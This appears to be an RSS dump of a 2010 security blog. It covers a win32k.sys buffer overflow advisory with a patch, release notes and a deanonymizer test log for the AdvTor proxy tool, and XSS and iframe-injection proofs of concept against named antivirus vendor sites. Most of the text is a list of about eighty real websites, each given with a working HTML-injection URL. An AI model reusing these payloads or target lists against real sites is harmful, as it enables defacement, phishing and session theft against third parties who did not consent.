nemesis.te-home.net http://nemesis.te-home.net <![CDATA[Patch for CreateDIBPalette in Win32k.sys for Windows 2000 and XP (all Service Packs)]]> http://nemesis.te-home.net/
Secunia wrote:
Secunia Advisory SA40870
Get alerted and manage the vulnerability life cycle
Free Trial

Release Date 2010-08-06

Popularity 5,905 views
Comments 2 comments


Criticality level Less critical
Impact Privilege escalation
Where Local system
Authentication level Available in Customer Area

Report reliability Available in Customer Area
Solution Status Unpatched

Systems affected Available in Customer Area
Approve distribution Available in Customer Area

Operating System Microsoft Windows 7
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2008
Microsoft Windows Storage Server 2003
Microsoft Windows Vista
Microsoft Windows XP Home Edition
Microsoft Windows XP Professional



Secunia CVSS Score Available in Customer Area
CVE Reference(s) No CVE references.

   

Description
Arkon has discovered a vulnerability in Microsoft Windows, which can be exploited by malicious people to gain escalated privileges.

The vulnerability is caused due to a boundary error in win32k.sys within the "CreateDIBPalette()" function when copying colour values into a buffer allocated with a fixed size when creating the DIB palette. This can be exploited via the "GetClipboardData()" API to cause a buffer overflow by specifying a large number of colours (greater than 256) via the "biClrUsed" field in a BITMAPINFOHEADER structure.

Successful exploitation may allow execution of arbitrary code with kernel privileges.

The vulnerability is confirmed in fully patched versions of Windows XP SP3, Windows Server 2003 R2 Enterprise SP2, Windows Vista Business SP1, Windows 7, and Windows Server 2008 SP2.


Source: Microsoft Windows win32k.sys Driver "CreateDIBPalette()" Buffer Overflow

I can confirm that all Service Packs of Windows 2000 are also vulnerable. The following patch is for Win32k.sys and it converts biClrUsed from Word to Byte.

Download:

This program is a proof of concept and is provided "as is". Any express or implied warranties are disclaimed. In no event shall the author be liable for any damages caused arising in any way out of the use of this software, even if advised of the possibility of such damage.
]]>
http://nemesis.te-home.net/ Mon, 9 Aug 2010 18:47:34 GMT 658409101
<![CDATA[AdvTor 0.1.0.3]]> http://nemesis.te-home.net/
http://img121.imageshack.us/img121/8725/windows764.png

Changes:
  • corrected: if Auto-Refresh was disabled, initialization progress was no longer shown
  • corrected: if Auto-Refresh was disabled, all log messages were shown as popup MessageBox'es
  • corrected: ASLR detection problems in Windows 2003 (thanks to RoLex for helping with tests)
  • corrected: the nickname was reset to local computer name if server options were changed (thanks to The Architect for reporting this error)
  • AdvTor can now force programs that use asynchronous sockets to use Tor
  • AdvTor also intercepts process creation functions, to set proxy restrictions on child processes created by a restricted process
  • if AdvTor.exe is renamed, AdvTor.dll must also be renamed


Download:



Testing http://deanonymizer.com under 64-bit version of Windows 7:

AdvTor.exe wrote:
[20:16:57] [proxy] Connection request for deanonymizer.com:80 .
[20:16:58] [proxy] Connection request for deanonymizer.com:80 .
[20:16:58] [proxy] Connection request for deanonymizer.com:80 .
[20:16:58] [proxy] Connection request for deanonymizer.com:80 .
[20:16:58] [proxy] Connection request for deanonymizer.com:80 .
[20:17:04] [proxy] Connection request for deanonymizer.com:80 .
[20:17:05] [proxy] Connection request for deanonymizer.com:80 .
[20:17:10] [proxy] Connection request for deanonymizer.com:80 .
[20:17:11] [proxy] Connection request for deanonymizer.com:80 .
[20:17:12] [proxy] Connection request for deanonymizer.com:80 .
[20:17:13] [proxy] Connection request for deanonymizer.com:80 .
[20:17:13] [proxy] Connection request for deanonymizer.com:80 .
[20:17:14] [proxy] Restricted process iexplore.exe created a new process with PID 2008 : "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /OCX /NoLibraryAdd /Play "http://deanonymizer.com/cgi-bin/payload.cgi?step=1&uid=9525139796792197" /prefetch:10
[20:17:14] [proxy] Setting proxy restrictions for process with PID 2008 (wmplayer.exe)
[20:17:14] [proxy] wmplayer.exe [WMNetMgr.dll]: Attempt to bypass proxy settings with address 66.109.20.52:554 .
[20:17:14] [proxy] Connection request for 66.109.20.52:554 .
[20:17:14] [proxy] wmplayer.exe [WMNetMgr.dll]: Attempt to bypass proxy settings with address 66.109.20.52:554 .
[20:17:14] [proxy] Connection request for 66.109.20.52:554 .
[20:17:15] [proxy] Connection request for 66.109.20.52:80 .
[20:17:16] [proxy] Connection request for 66.109.20.52:80 .
[20:17:22] [proxy] Connection request for deanonymizer.com:80 .
[20:17:34] [proxy] Connection request for deanonymizer.com:80 .
[20:17:34] [proxy] Connection request for deanonymizer.com:80 .
[20:17:36] [proxy] Restricted process iexplore.exe created a new process with PID 2716 : "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /OCX /NoLibraryAdd /Play "http://deanonymizer.com/cgi-bin/payload.cgi?step=2&uid=9525139796792197" /prefetch:10
[20:17:36] [proxy] Setting proxy restrictions for process with PID 2716 (wmplayer.exe)
[20:17:44] [proxy] Connection request for deanonymizer.com:80 .
[20:17:47] [proxy] Connection request for deanonymizer.com:80 .
[20:17:47] [proxy] Connection request for deanonymizer.com:80 .
[20:17:48] [proxy] Restricted process iexplore.exe created a new process with PID 912 : "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /OCX /NoLibraryAdd /Play "http://deanonymizer.com/cgi-bin/payload.cgi?step=3&uid=9525139796792197" /prefetch:10
[20:17:48] [proxy] Setting proxy restrictions for process with PID 912 (wmplayer.exe)
[20:17:56] [proxy] Connection request for deanonymizer.com:80 .
[20:17:59] [proxy] Connection request for deanonymizer.com:80 .
[20:17:59] [proxy] Connection request for deanonymizer.com:80 .
[20:18:02] [proxy] Connection request for deanonymizer.com:80 .
[20:18:06] [proxy] Connection request for deanonymizer.com:80 .
[20:18:09] [proxy] Connection request for deanonymizer.com:80 .
[20:18:10] [proxy] Connection request for deanonymizer.com:80 .
[20:18:11] [proxy] Connection request for deanonymizer.com:80 .
[20:18:11] [proxy] Connection request for deanonymizer.com:80 .
[20:18:19] [proxy] Connection request for deanonymizer.com:80 .
[20:18:23] [proxy] Connection request for deanonymizer.com:80 .
[20:18:26] [proxy] Connection request for deanonymizer.com:80 .
[20:18:28] [proxy] Connection request for deanonymizer.com:80 .
[20:18:28] [proxy] Connection request for deanonymizer.com:80 .
[20:18:28] [proxy] Connection request for deanonymizer.com:80 .
[20:18:40] [proxy] Connection request for deanonymizer.com:80 .
[20:18:42] [proxy] Connection request for deanonymizer.com:80 .
[20:18:42] [proxy] Connection request for deanonymizer.com:80 .
[20:18:52] [proxy] Connection request for deanonymizer.com:80 .
[20:18:54] [proxy] Connection request for deanonymizer.com:80 .
[20:18:54] [proxy] Connection request for deanonymizer.com:80 .
[20:19:05] [proxy] Connection request for deanonymizer.com:80 .
[20:19:06] [proxy] Connection request for deanonymizer.com:80 .
[20:19:06] [proxy] Connection request for deanonymizer.com:80 .
[20:19:17] [proxy] Connection request for deanonymizer.com:80 .
[20:19:20] [proxy] Connection request for deanonymizer.com:80 .
[20:19:20] [proxy] Connection request for deanonymizer.com:80 .
[20:19:32] [proxy] Connection request for deanonymizer.com:80 .
[20:19:35] [proxy] Connection request for deanonymizer.com:80 .
[20:19:35] [proxy] Connection request for deanonymizer.com:80 .
[20:19:49] [proxy] Connection request for deanonymizer.com:80 .
[20:19:53] [proxy] Connection request for deanonymizer.com:80 .
[20:19:53] [proxy] Connection request for deanonymizer.com:80 .
[20:20:05] [proxy] Connection request for deanonymizer.com:80 .
[20:20:09] [proxy] Connection request for deanonymizer.com:80 .
[20:20:09] [proxy] Connection request for deanonymizer.com:80 .
[20:20:13] [proxy] Connection request for www.apple.com:80 .
[20:20:20] [proxy] Connection request for qtinstall.apple.com:80 .
[20:20:25] [proxy] Connection request for appldnld.apple.com.edgesuite.net:80 .
[20:20:34] [proxy] Connection request for 66.109.20.52:80 .
[20:20:37] [proxy] Connection request for 66.109.20.52:80 .
[20:20:45] [proxy] Connection request for deanonymizer.com:80 .
[20:20:56] [proxy] Connection request for deanonymizer.com:80 .
[20:20:56] [proxy] Connection request for deanonymizer.com:80 .
[20:21:00] [proxy] Connection request for www.apple.com:80 .
[20:21:11] [proxy] Connection request for qtinstall.apple.com:80 .
[20:21:19] [proxy] Connection request for appldnld.apple.com.edgesuite.net:80 .
[20:21:26] [warn] Your application (using socks4 to port 21) is giving Tor only an IP address. Applications that do DNS resolves themselves may leak information. Consider using Socks4A (e.g. via privoxy or socat) instead. For more information, please see http://wiki.noreply.org/noreply/TheOnionRouter/TorFAQ#SOCKSAndDNS.
[20:21:26] [proxy] Connection request for 66.109.20.52:21 .
[20:21:28] [warn] Your application (using socks4 to port 21) is giving Tor only an IP address. Applications that do DNS resolves themselves may leak information. Consider using Socks4A (e.g. via privoxy or socat) instead. For more information, please see http://wiki.noreply.org/noreply/TheOnionRouter/TorFAQ#SOCKSAndDNS.
[20:21:28] [proxy] Connection request for 66.109.20.52:21 .
[20:21:29] [warn] Your application (using socks4 to port 21) is giving Tor only an IP address. Applications that do DNS resolves themselves may leak information. Consider using Socks4A (e.g. via privoxy or socat) instead. For more information, please see http://wiki.noreply.org/noreply/TheOnionRouter/TorFAQ#SOCKSAndDNS.
[20:21:29] [proxy] Connection request for 66.109.20.52:21 .
[20:21:36] [proxy] Connection request for deanonymizer.com:80 .
[20:21:37] [proxy] Connection request for deanonymizer.com:80 .
[20:21:37] [proxy] Connection request for deanonymizer.com:80 .
[20:21:38] [proxy] Connection request for www.apple.com:80 .
[20:21:39] [proxy] Connection request for qtinstall.apple.com:80 .
[20:21:40] [proxy] Connection request for appldnld.apple.com.edgesuite.net:80 .
[20:21:50] [proxy] Connection request for deanonymizer.com:80 .
[20:21:52] [proxy] Connection request for deanonymizer.com:80 .
[20:21:58] [proxy] Connection request for deanonymizer.com:80 .
[20:22:04] [proxy] Connection request for deanonymizer.com:80 .
[20:22:04] [proxy] Connection request for deanonymizer.com:80 .
[20:22:04] [proxy] Connection request for xerobank.com:80 .
[20:22:04] [proxy] Connection request for maps.google.com:80 .
[20:22:06] [warn] Your application (using socks4 to port 443) is giving Tor only an IP address. Applications that do DNS resolves themselves may leak information. Consider using Socks4A (e.g. via privoxy or socat) instead. For more information, please see http://wiki.noreply.org/noreply/TheOnionRouter/TorFAQ#SOCKSAndDNS.
[20:22:06] [proxy] Connection request for 88.198.80.243:443 .
[20:22:07] [proxy] Connection request for deanonymizer.com:80 .
[20:22:07] [proxy] Connection request for deanonymizer.com:80 .
[20:22:07] [proxy] Connection request for deanonymizer.com:80 .
[20:22:07] [proxy] Connection request for deanonymizer.com:80 .
[20:22:07] [proxy] Connection request for deanonymizer.com:80 .
[20:22:07] [proxy] Connection request for deanonymizer.com:80 .
[20:22:09] [proxy] Connection request for deanonymizer.com:80 .
[20:22:10] [proxy] Connection request for deanonymizer.com:80 .
[20:22:10] [proxy] Connection request for deanonymizer.com:80 .
[20:22:10] [proxy] Connection request for deanonymizer.com:80 .


http://img830.imageshack.us/img830/8322/ie1.png


]]>
http://nemesis.te-home.net/ Tue, 10 Aug 2010 18:16:34 GMT 3655199975
<![CDATA[AVG.pl - XSS & IFrame Injection]]> http://nemesis.te-home.net/index.html http://www.avg.pl/rejestracja.html

PoC:

XSS -
Code:
"><script>alert(String.fromCharCode(88,83,83))</script>


http://img826.imageshack.us/img826/8850/xss.png

IFrame Injection -
Code:
"><iframe src=http://nemesis.te-home.net></iframe>


http://img228.imageshack.us/img228/2923/iframe.png
']['€AM€LiT€]]>
http://nemesis.te-home.net/index.html Fri, 13 Aug 2010 08:19:41 GMT 2190724107
<![CDATA[Kaspersky.pl, F-Secure.com.pl - XSS & IFrame Injection]]> http://nemesis.te-home.net/ http://www.kaspersky.pl/oem.html

PoC: http://img62.imageshack.us/img62/7577/kasperskyf.png

Vulnerable page at f-secure.com.pl - http://f-secure.com.pl/order.html?action=confirm

PoC:

XSS -
Code:
"><script>alert(String.fromCharCode(88,83,83))</script>


http://img829.imageshack.us/img829/8783/fsecure.png

IFrame Injection -
Code:
"><iframe src=http://nemesis.te-home.net></iframe>


http://img245.imageshack.us/img245/9003/fsecure2.png


']['€AM€LiT€]]>
http://nemesis.te-home.net/ Fri, 13 Aug 2010 09:21:19 GMT 3486801517
<![CDATA[Installing KB980436 Security Update for SChannel.dll on Windows XP (All Service Packs)]]> http://nemesis.te-home.net/
microsoft.com wrote:
A security issue has been identified that could allow an unauthenticated remote attacker to compromise your system and gain control over it. You can help protect your system by installing this update from Microsoft. After you install this update, you may have to restart your system.


http://img256.imageshack.us/img256/1117/setuphasdetected.png

If you have an older and no longer supported OS, you can still install some security updates, including the updates for shell32.dll and for SChannel.dll on any Service Pack of Windows XP. Not all updates can be installed this way, because some of them may expect some functionality your OS doesn't have. Installing updates on wrong OS may cause undesired effects and system instability.

Installing KB980436 on Windows XP:

]]>
http://nemesis.te-home.net/ Sat, 14 Aug 2010 12:47:41 GMT 2820594635
<![CDATA[AdvTor 0.1.0.4]]> http://nemesis.te-home.net/
http://img840.imageshack.us/img840/7223/chrome1.png

Usually, most people who change proxy settings in their browsers want to check their new IP. One of the most visited websites by people who want to check their IP is http://www.whatismyip.com . Unfortunately, most Tor exit nodes are banned there.

http://img829.imageshack.us/img829/9498/chrome2c.png

Can a website be DoS'ed with a request every 5 minutes ? A website hosted on a dial-up connection can handle more. To bypass this ban, first we enable tracking for ".whatismyip.com" address.

http://img826.imageshack.us/img826/1908/advtor1.png

We search for an exit node that is not banned.

http://img717.imageshack.us/img717/1797/advtor2.png

To make sure that every time you visit www.whatismyip.com the node that is not banned is used as exit node, select the option to remember exit for www.whatismyip.com .

http://img829.imageshack.us/img829/1730/advtor3.png

Changes:
  • GeoIP information is included as a pre-compiled search tree, GeoIP lookup functions are written in asm; also, a conversion program is included to convert a downloaded GeoIPCountryWhois.csv to geoip_c.h (csv2asm)
  • AdvTor now also intercepts CreateProcessAsUser from advapi32.dll
  • context menu from debug window has more options related to selected text if an address is found in it: track exit for selected_host (config option: TrackHostExits), remember/forget exit for selected_host (config option: AddressMap)
  • debug messages shown by AdvTor.dll have different severity levels
  • current exit node is shown in title bar
  • added a DialogBox for selecting a specific exit node or a country from which a random exit node will be chosen (accessible from "New identity" or from systray menu option "Advanced")
  • added a "Process Finder" DialogBox to help selecting a process by selecting a window it created
  • system tray menu has a list with 30 usable exit nodes
  • AdvTor verifies the minimum required version of AdvTor.dll (version 0.1.0.4 requires AdvTor.dll 0.1.0.4)


Download:


]]>
http://nemesis.te-home.net/ Sat, 21 Aug 2010 14:28:16 GMT 559786295
<![CDATA[Collection of XSS vulnerable websites]]> http://nemesis.te-home.net/
http://www.serials.ws/?chto=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://subscene.com/filmsearch.aspx?q=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.zebulon.fr/search.php?q=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://promoddl.com/ddl.php?q=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://keygenguru.com/search/?search=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.crackserver.com/search.php?name=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.zcrack.com/crack_download_search.php?crack=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://keygens.nl/cracked_warez_search.php?s=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.crackfind.com/test.php?chto=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.supercracks.net/search.php?crack=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.mucacadownloads.com/search.php?where=&amp;what=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.andr.net/?str=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://search.gamecopyworld.com:9999/data/gcw.shtml?search=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.smartcracks.com/search.php?crack=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.cracklooker.com/search.shtml?s=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://crackcrew.com/search.php?q=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.smartserials.com/search_serial.php?serials=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.serialsws.org/?chto=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.freedownloadscenter.com/Search/newsearch.php3?Category=0&amp;S_S=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.serialbay.com/search.html?q=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.superserials.com/search.php?s=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.torrentpharma.com/search.php?searWords=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://search.monova.org/search.php?term=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://ligg.org/search_torrent/?s=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://torrent.jiwang.cc/torrents-search.php?search=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://torrentman.com/search.php?search=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://extratorrent.com/search/?search=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.areze.com/videos.php?vq=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.tooorgle.com/results.php?security=666&amp;q=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://searchenginewatch.com/sew_search_results?q=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://en.kingofsat.net/find.php?question=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.snap.com/classicsearch.php?query=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.the-breaks.com/search.php?term=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.opendrivers.com/search.php?search=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.nodevice.com/search/search.html?text=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.givemefile.net/?q=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.itprofessionals.co.uk/searchresults.asp?keyword=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://se.creative.com/search/?keywords=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://rapidpedia.com/?q=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.searchshared.com/?key=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.rapidsharedata.com/tag/%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.filesearch.gr/?q=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.rapid4files.com/rapidshare.php?q=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://rapidtrend.com/?q=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://filefab.com/index.php?psearch=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.sensus.se/Sok/Sok-pa-webbplatsen/?searchquery=%22%3Cimg%20src=http%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://nt.se/sok/?querystring=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.undertexter.se/?p=soek&amp;str=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://nyheter24.se/filmtipset/search.cgi?search_value=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://feber.se/search/?q=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://xage.ru/tag.php?tag=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://search.mywebsearch.com/mywebsearch/AJmain.jhtml?searchfor=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.pics4learning.com/?query=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.poemhunter.com/search/?q=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www-spires.fnal.gov/spires/find/hep/?rawcmd=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://blindsearch.fejus.com/?q=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://web1.exactseek.com/webclient/?q=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.mega-search.net/search.php?group=audio&amp;terms=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.librarything.com/search_author.php?q=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://thenextweb.com/?s=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.mp3hunting.com/?q=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.addall.com/New/submitNew.cgi?query=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://metasearch.com/www2search.cgi?p=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.chemindustry.com/apps/search/?search_term=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.webhostingsearch.com/search?searchString=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.musicrobot.com/cgi-bin/search.pl?terms=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://domain-search.domaintools.com/?q=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.fco.gov.uk/en/advanced-search?t=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.socialworksearch.com/cgi/socialwork.cgi?Terms=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.hostsearch.com/search_results.asp?zoom_query=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://cpan.uwinnipeg.ca/search?query=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.displaysearch.com/cps/rde/xchg/displaysearch/hs.xsl/search_results.asp?txtSearchText=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.culturalheritage.net/cgi-bin/search/hyperseek.cgi?Terms=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://infomine.ucr.edu/cgi-bin/canned_search?query=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.filez.com/?q=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.hyperdictionary.com/search.aspx?define=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E
http://www.dict.org/bin/Dict?Query=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.ldoceonline.com/noresult/?q=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.wordsmyth.net/?ent=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.allwords.com/query.php?Keyword=%22%3Cimg&#43;src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg&#43;%2F%3E

Note: This is a proof of concept and it doesn't reflect the views or interests of all above websites.

This collection is to be continued, aswell as a collection of websites that require POST method for submitting a query.
']['€AM€LiT€]]>
http://nemesis.te-home.net/ Fri, 27 Aug 2010 13:59:12 GMT 2984107369
<![CDATA[AdvTor 0.1.0.5]]> http://nemesis.te-home.net/
Changes:
  • corrected: if LoadLibrary failed in target process, it was still shown as intercepted
  • corrected: when unloading the AdvTor.dll, UnloadDLL did not wait for PipeThread to finish
  • corrected: high CPU usage if no running exit nodes were found (thanks to RoLex for reporting this problem)
  • corrected: system tray menus were not closed when the user clicked outside them
  • corrected: AdvTor.dll did not always close handles of remote threads
  • corrected: AdvTor.dll did not always free the memory it allocated in other processes
  • corrected: AdvTor.dll did not intercept process creation functions if the option to fake local time was disabled
  • corrected: intercepted processes that were not updated in GUI were not released when AdvTor exited
  • corrected: intercepting functions in suspended processes sometimes failed
  • corrected: AdvTor.dll could re-hook same procedure twice if a previous instance was terminated from task manager
  • corrected: AdvTor.exe will no longer attempt to intercept itself if the user selects it from process list (thanks to RoLex for reporting this error)
  • if no running exit nodes can be found for selected country, the notification message is shown only once, until a good exit node is found (thanks to RoLex for reporting this problem)
  • the confusing message "attempt to bypass proxy settings" is replaced with "redirecting connection from address" (thanks to Meka][Meka for reporting this problem)
  • system tray menu has a new submenu "Release" with all intercepted processes to allow unloading AdvTor.dll from them
  • AdvTor.dll now shows more information about interception failures
  • AdvTor.dll no longer loads user32.dll in intercepted processes
  • AdvTor.dll also intercepts functions gethostbyname, WSAAsyncGetHostByName, gethostbyaddr, WSAAsyncGetHostByAddr (Windows 2000+), getnameinfo, GetNameInfoW, getaddrinfo, GetAddrInfoW (Windows XP SP2+) (thanks to RoLex for helping with tests)
  • programs that are intercepted by AdvTor will have all DNS queries and reverse DNS queries resolved by OR network
  • programs that are intercepted can access .onion addresses, AdvTor.dll will resolve them to an IP within range 127.16.* (localhost) and will keep a cache with geneated IPs and corresponding .onion addresses to use in connection requests
  • process tree also shows PID values when selecting a window
  • when AdvTor.dll sends a notification about an intercepted process that doesn't respect proxy settings, it also shows the PID for that process (requested by RoLex)
  • the lists with exit nodes will also have an entry "no exit", for those who want only to see where an intercepted program would connect, but without allowing it to connect or to send anything
  • added verification for "localhost" so an intercepted process won't try to use OR network to resolve it (Opera resolves "localhost" every time you save a file)
  • added verification for "wpad" to prevent vulnerable applications from using OR network to resolve it (Chrome, IE, Yahoo Messenger, etc.)

Download:



